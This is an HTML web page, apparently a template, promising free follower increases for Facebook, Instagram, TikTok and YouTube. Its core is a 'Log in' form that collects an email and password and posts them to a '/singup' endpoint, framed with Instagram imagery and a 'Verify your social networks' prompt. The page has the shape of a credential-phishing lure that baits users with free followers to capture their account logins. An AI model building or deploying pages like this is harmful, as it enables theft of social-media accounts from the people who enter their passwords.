<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="../public/style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://unpkg.com/aos@next/dist/aos.css" />
</head>
<body>
    <div class="header">
       <h2 class="perfect">Perfect </h2>
       <ul class="list">
           <li><a href="/" class="h">How it works</a></li>
       </ul>
    </div>
    <div class="box">
        <h1 class="on"  data-aos="fade-up">Increase your followers on <Br> your social networks for free</h1>
    </div>

  <div class="box-two">
      <div class="image"><br>
          <img src="../public/insta.png" id="img" width=700%"  data-aos="fade-up">
      </div>
      <div class="form"  data-aos="fade-up"><br>
          <div class="center">
            <h1 class="log">Log in</h1><Br>
        <form method="POST" action="/singup"">
            <input type="email" placeholder="email" name="email" id="email" ><br>
            <input type="password" placeholder="password" name="password" id="password"><br>
            <input type="submit" value="login" id="btn" >
        </form>
        </div>
      </div>
  </div>

  <div class="about"  data-aos="fade-up"><br>
      <h2 class="use">Use this  for  Facebook Instagram Tik Tok Youtube</h2><br>
      <h2 class="very">Verify your social networks</h2><img src="../public/1.png" class="veryf" width="50px"><br>
      <img src="../public/og__eop0rb3mevma_overview.png" width="80%">
  </div>
  

  <h1 style="text-align:center;color: rgb(27, 27, 27);margin-top: 25px;">Social media - Statistics</h1>
  <div class="pop"  data-aos="fade-up">
   
        <div class="fb">Facebook</div>

     
        <div class="insta">Instagram</div>
   
      <div class="youtube">Youtube</div>
      <div class="tiktok">Tik Tok</div>
      <div class="whatsapp">whats app</div>
  </div>
<script src="../public/app.js"> </script>
<script src="https://unpkg.com/aos@next/dist/aos.js"></script>
<script>
  AOS.init({
    oduration: 2000,
    		 delay: 10
  });
</script>
</body>
</html>